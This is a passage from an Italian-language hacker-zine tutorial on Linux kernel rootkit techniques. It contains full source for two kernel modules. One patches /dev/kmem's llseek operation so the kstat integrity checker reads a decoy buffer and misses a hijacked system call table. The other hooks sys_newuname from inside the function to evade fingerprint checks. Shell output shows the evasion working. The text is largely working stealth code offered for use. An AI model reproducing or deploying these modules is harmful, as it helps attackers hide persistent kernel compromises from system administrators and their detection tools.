           printf("Checking sys_call_table array now at 0x%lx ...\n\n\n", sct);
           close(kd);
           return 1;
        }
        /* should not get here */
        return 0;
}

Questa e` la funzione che controlla l'integrita` della funzione system_call,
piuttosto semplice come potete vedere: apre kmem, legge 100 bytes e poi
effettua un banale parsing sul valore della sys call table, esattamente come
facciamo noi quando lo cerchiamo per modificarlo.
Se poi il valore cosi` trovato e quello hardcodato non corrispondono eccoci
individuati.
Vediamo ora piu` in dettaglio la funzione kread:

int kread(int des, unsigned long addr, void *buf, int len)
{
        int rlen;
        if(lseek(des, (off_t)addr, SEEK_SET) == -1)
                return -1;
        if((rlen = read(des, buf, len)) != len)
                return -1;
        return rlen;
}

Questa e` semplicissima: si posiziona all'offset desiderato sul file descriptor
(ovvero equivalente a kmem nel nostro caso) legge la quantita` di dati
desiderata e poi ritorna. Sembrerebbe tutto solido... se non fosse per il fatto
che kmem e` un file e pertanto attraverso il VFS possiamo controllarne il
comportamento.
Torniamo un attimo indietro alla struttura del VFS: la struct file contiene un
campo molto interessante chiamato f_op che e` un puntatore ad una struttura di
tipo file_operations. Vediamola:

struct file_operations {
        struct module *owner;
        /* Aggiorna la posizione nel file */
        loff_t (*llseek) (struct file *, loff_t, int);
        /* Legge size_t bytes a partire da loff_t, *l_off (che di solito
           rappresenta la posizione all'interno del file) e` poi incrementato
	 */
        ssize_t (*read) (struct file *, char *, size_t, loff_t *);
	/* Come sopra, solo che scrive */
        ssize_t (*write) (struct file *, const char *, size_t, loff_t *);
        /* Ritorna la prossima directory-entry di una directory in void,
        filldir contiene l'indirizzo di una funzione ausiliaria che viene
        utilizzata per estrarre i campi da una directory-entry. Nel caso
        volessimo nascondere dei files dovremmo modificare questo puntatore
        e crearci una filldir ad hoc */
        int (*readdir) (struct file *, void *, filldir_t);
        unsigned int (*poll) (struct file *, struct poll_table_struct *);
        int (*ioctl) (struct inode *, struct file *, unsigned int,
	                 unsigned long);
       int (*mmap) (struct file *, struct vm_area_struct *);
       int (*open) (struct inode *, struct file *);
       int (*flush) (struct file *);
       int (*release) (struct inode *, struct file *);
       int (*fsync) (struct file *, struct dentry *, int datasync);
       int (*fasync) (int, struct file *, int);
       int (*lock) (struct file *, int, struct file_lock *);
       ssize_t (*readv) (struct file *, const struct iovec *, unsigned long,
                        loff_t *);
       ssize_t (*writev) (struct file *, const struct iovec *, unsigned long,
                        loff_t *);
       ssize_t (*sendpage) (struct file *, struct page *, int, size_t,
                        loff_t *, int);
       unsigned long (*get_unmapped_area)(struct file *, unsigned long,
                        unsigned long, unsigned long, unsigned long);
};

Questa struttura memorizza i puntatori alle funzioni che vengono utilizzate
per la "gestione" di un file... cosa che kmem e`.
Percio` potremmo, ad esempio, modificare il puntatore alla funzione di
lseeking, facendo in modo che se venga richiesto un lseek ad un certo indirizzo
essa lo faccia ad un altro indirizzo. Cosi` facendo la kread di kstat
salterebbe totalmente andando a leggere dove noi vogliamo, ovvero in un buffer
appositamente creato per ingannarne il parsing :)

<-| LKEPD/lseeker.c |->
#define __KERNEL__
#define MODULE

#ifdef MODVERSIONS
#include <linux/modversions.h>
#endif

#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/sched.h>
#include <linux/fs.h>
#include <linux/file.h>

#define TARGET "/dev/kmem"
#define FORBIDD 0xc01079c8 /* Indirizzo di system_call */

MODULE_LICENSE("GPL");

typedef long long (*v_lseek) (struct file *, long long, int);
v_lseek o_lseek;

static unsigned char buffer[100]={0};

int patch_vfs(const char *name,v_lseek *orig,v_lseek new)
{
        /* Accediamo alla struct file relativa a kmem */
	struct file *file=filp_open(name,O_RDONLY,0);
	if(!file)
		return -1;
	/* Salviamo il puntatore originario */
	*orig=(v_lseek)file->f_op->llseek;
	/* Sovrascriviamolo col nostro */
	file->f_op->llseek=new;
	/* "Chiudiamolo" pure, ormai il puntatore e` sovrascritto */
	filp_close(file,0);
	return 0;
}

int unpatch_vfs(const char *name,v_lseek orig)
{
	struct file *file=filp_open(name,O_RDONLY,0);
	if(!file)
		return -1;
	file->f_op->llseek=orig;
	filp_close(file,0);
	return 0;
}

long long my_lseek(struct file *target,long long offset,unsigned int origin)
{
	if((unsigned long)offset==FORBIDD)
		offset=(long long)&buffer;
	
	 return	o_lseek(target,offset,origin);

}

int init_module(void)
{
 	/* Copia nel buffer i dati che kstat andra` a leggere */
	memcpy(buffer,(void*)FORBIDD,sizeof(buffer));
	return patch_vfs(TARGET,&o_lseek,(v_lseek)my_lseek);
}
 
int cleanup_module(void)
{
	return unpatch_vfs(TARGET,o_lseek);
}
<-X->

 Vortex:~# insmod lseeker.o
 Vortex:~# ./kstat -s 0

 Legal system_call handler should be at 0xc01079c8 ... OK!

 Legal sys_call_table should be at 0xc03762f8 ... OK!

 No System Call Address Modified


 Vortex:~# insmod hijack.o /* E` il modulo presentato qualche sezione fa */
 Vortex:~# su angel
 angel@Vortex:/root$ dmesg
  Hello world
  Hello world
  Hello world
  Hello world
  Hello world
  Hello world
  Hello world
 angel@Vortex:/root$ exit
  exit
 Vortex:~# ./kstat -s 0

  Legal system_call handler should be at 0xc01079c8 ... OK!

  Legal sys_call_table should be at 0xc03762f8 ... OK!

  No System Call Address Modified


 Vortex:~# rmmod lseeker
 Vortex:~# ./kstat -s 0

  Legal system_call handler should be at 0xc01079c8 ... OK!

  Legal sys_call_table should be at 0xc03762f8 ... WARNING!
                                                      sys_call_table hijacked!

  Checking sys_call_table array now at 0xda0a7c00 ...


  sys_getresgid32                 0xf9b4c0a0 WARNING! should be at 0xc012eeb0

 Vortex:~# 
 
Perfetto :)
Ovviamente questo era solo un esempio, ma sulla sua falsa riga potete
ingannare qualsiasi tool che si basi su questo tipo di controlli, in modo
estremamente semplice.
Nel caso in cui pero` il controllo venga effettuato direttamente a kernel
space le cose non sono proprio cosi` semplici: poniamo il caso di dover
hijackare una funzione attraverso la tecnica del salto, ma e` presente un
modulo del sysadmin che ha un fingerprint dei primi bytes della funzione,
percio` se li sovrascrivessimo verremmo scoperti. Tralasciando soluzioni
banali come la rimozione del modulo "benigno", come potremmo fare?

1) Potremmo cercare all'interno della memoria del modulo benigno con un
   semplice pattern matching il fingerprint della funzione da hijackare e
   modificarlo, ma nel caso venisse cifrato in un qualsiasi modo diventerebbe
   estremamente laborioso questo tipo di approccio.

2) Potremmo hijackare un'altra funzione per ottenere il medesimo risultato, ma
   non sempre e` possibile.

3) Potremmo hijackare la funzione... dall'interno, in modo da non modificare
   nessuno dei bytes controllati.


- RIDIREZIONE DI UNA FUNZIONE DAL SUO INTERNO

Questa e` la variante della tecnica esposta nella sezione sulla redirezione di
una qualsiasi funzione. Come gia` detto precedentemente, applicare questa
variante necessita un notevole studio, in quanto andare a modificare un codice
nel mezzo puo' essere causa di non pochi problemi dato che, ad esempio, non
possiamo alterare in alcun modo i dati memorizzati se non vogliamo alterarne
il funzionamento. Inoltre, ovviamente, la struttura di un hook di questo tipo
dipende dalla sequenza delle istruzioni del codice che andiamo a modificare,
percio` necessita ogni volta di un aggiustamento ad hoc per funzionare.
La struttura e` abbastanza semplice:

1) Saltiamo dal mezzo di un altro codice ad una nostra funzione.
2) Eseguiamo quello che dobbiamo.
3) Risaltiamo nel codice originario per far continuare la sua esecuzione.

1 - Per effettuare questo dobbiamo utilizzare la tecnica del salto vista in
    precedenza, ma con un piccolo accorgimento: prima sovrascrivevamo i primi
    7 bytes della funzione selvaggiamente, ma adesso dobbiamo stare attenti a
    non rompere nessuna istruzione del codice! Questo vuol dire che dobbiamo
    trovare uno spazio di ALMENO 7 bytes per poter injectare il nostro codice,
    ma potrebbe benissimo darsi che si debba salvarne piu` di 7. Vedremo
    meglio in seguito comunque.

2 - Non penso servano troppe spiegazioni per questo punto... :) Basta creare
    una funzione del tipo void funzione(void) con all'interno il codice che ci
    interessa eseguire.

3 - Ecco la parte interessante. Non possiamo semplicemente far ritornare la
    nostra funzione, ritorneremmo nel mezzo delle istruzioni sovrascritte
    senza avere eseguito parte del codice del programma originario [ovvero i
    bytes sovrascritti dal nostro mov/jmp], dobbiamo percio` eseguire quel
    codice e risaltare nel mezzo del programma all'indirizzo contenente le
    istruzioni immediatamente seguenti a quelle cha abbiamo
    backuppato-eseguito. Non e` tutto pero`, c'e` ancora una cosa che dobbiamo
    fare prima di far questo, ovvero ripristinare a mano lo stack frame.
    All'inizio del preludio di una funzione troviamo questo codice:

        Dump of assembler code for function main:
        0x080487c0 <main+0>:    push   %ebp
        0x080487c1 <main+1>:    mov    %esp,%ebp

    Saltando via senza eseguire tutta la nostra funzione lo stack frame non
    verrebbe ripristinato, percio` dovremo farlo manualmente attraverso
    l'istruzione "leave".

Vediamo un esempio, cosi` il tutto apparira` molto piu semplice: ora
hijackeremo la sys_newuname.
Innanzitutto ci serve un suo dump per vedere dove possiamo agganciarci:

 Vortex:~# grep sys_newuname /usr/src/linux/System.map
 c012f970 T sys_newuname
 Vortex:~# ./xdump -f /dev/kmem -o 0xc012f970 -l 20 -d	[3]
 OFFSET: 0xc012f970
 LENGTH: 0x00000014

 0xc012f970: 83 EC 14                            sub     %esp, $0x14
 0xc012f973: 89 5C 24 0C                         mov      0C(%esp), %ebx
 0xc012f977: BB D4 91 37 C0                      mov     %ebx, $0xC03791D4
 0xc012f97c: 89 D8                               mov     %eax, %ebx
 0xc012f97e: 89 74 24 10                         mov      10(%esp), %esi
 0xc012f982: 31 F6                               xor     %esi, %esi
 ...
 ...

Come possiamo vedere, subito dopo i primi 7 bytes abbiamo due mov che formano
un blocco di esattamente 7 bytes, percio` se ci mettessimo li` non dovremmo
memorizzare istruzioni extra. Se ad esempio fossero stati solo 6 al posto di
7, avremmo dovuto includere nell'hook anche TUTTA l'istruzione seguente e
cosi` via, fino ad avere uno spazio di 7 bytes.
Ora vediamo un'implementazione di quanto detto fin'ora:
 
<-| LKEPD/middlechain.c |->
#define __KERNEL__
#define MODULE
#ifdef MODVERSIONS
#include <linux/modversions.h>
#endif

#include <linux/module.h>
#include <linux/kernel.h>
 
#define CODESIZE 	7
#define BACKUP_SIZE	7
/* Indirizzo da cui inizieremo a backuppare ed a sovrascrivere */
#define HOOKSTART	0xc012f977

MODULE_LICENSE("GPL");
/* \xbe\x90\x90\x90\x90\xff\xe6 e` una variante della tecnica del salto dove
   invece di eax usiamo esi come registro. Ovviamente e` assolutamente
   equivalente, ho utilizzato un altro registro perche` come possiamo vedere
   all'indirizzo 0xc012f97c del dump il registro eax e` utilizzato, percio`
   non posiamo sovrascriverne il valore
 */
unsigned static char buffer[BACKUP_SIZE+CODESIZE]="\x90\x90\x90\x90\x90\x90\x90"
 					  "\xbe\x90\x90\x90\x90\xff\xe6";
							
unsigned static char jumpbuf[CODESIZE]="\xbe\x90\x90\x90\x90\xff\xe6";
 
void chain(void)
{
	printk("Hello world\n");
        /* Ripristiniamo il precedente stack frame, eseguiamo i bytes
           backuppati e risaltiamo nel codice originario
         */
	asm volatile("leave;jmp buffer");
}

int init_module(void)
{
        /* Memorizziamo il backup */
	memcpy(buffer,(void*)HOOKSTART,BACKUP_SIZE);
	/* Memorizziamo l'indirizzo di ritorno per poterci jumpare */
        *(unsigned long *)&buffer[BACKUP_SIZE+1]=(unsigned long)HOOKSTART+
	                                                          BACKUP_SIZE;
   	/* Inseriamo l'indirizzo della nostra funzione */
	*(unsigned long*)&jumpbuf[1]=(unsigned long)chain;
        /* Sovrascriviamo la funzione originaria */
	memcpy((void*)HOOKSTART,jumpbuf,CODESIZE);
	return 0;
}

void cleanup_module(void)
{
	memcpy((void*)HOOKSTART,buffer,BACKUP_SIZE);
}
<-X->

 Vortex:~# insmod middlechain.o
 Vortex:~# dmesg
 Hello world
 Vortex:~#

Hook perfettamente riuscito :-)
Sicuramente l'utilizzo di questo sistema diventa inutile nel momento in cui
viene fatto un fingerprint/hash della funzione per intero, ma ovviamente
questo non e` l'unico modo in cui questa puo' essere utilizzata :-)
Per i tool che procedono in quel modo [4] ci sono altri sistemi, alcuni anche
se in modo non esplicito ve li ho mostrati, altri no, ma questa e` una storia
che non vi raccontero`, almeno per ora :-)

 
Note:
[1] Per una trattazione completa guardate Understanding Linux Kernel
    2nd Edition
[2] http://www.s0ftpj.org/tools/kstat24_v1.1-2.tgz
[3] Ovviamente xdump e` un'utility scritta apposta, non vi sara` difficile
    crearne una vostra utilizzando le libdisasm
[4] Come "dilemma" ad esempio, che potete trovare su http://twiz.antifork.org


- CONCLUSIONE

Questo e` quanto, vi ho illustrato quelle che a mio avviso sono le tecniche
migliori per realizzare questo genere di software, ma ora tocca a voi
migliorarle, personalizzarle ed inventarne di nuove; avete gli strumenti per
fare [quasi] qualsiasi cosa adesso, magari aggiungero` altro piu` avanti, per
ora voi dovete solo imparare ad usare queste tecniche ricordandovi che niente
e` occultabile al 100% o che un'accurata analisi non troverebbe: ovvero state
in campana :)
Sperando che il mio lavoro vi sia piaciuto vi saluto, a presto, bye :)


- THANKS: All Antifork and #phrack.it guys :)


- BIBLIOGRAFIA

   http://www.phrack.org
   http://www.antifork.org
   https://www.s0ftpj.org
   http://spacewalker.dyns.be
   Linux Device Drivers
   Understanding Linux Kernel 2nd edition


================================================================================
------------------------------------[ EOF ]-------------------------------------
================================================================================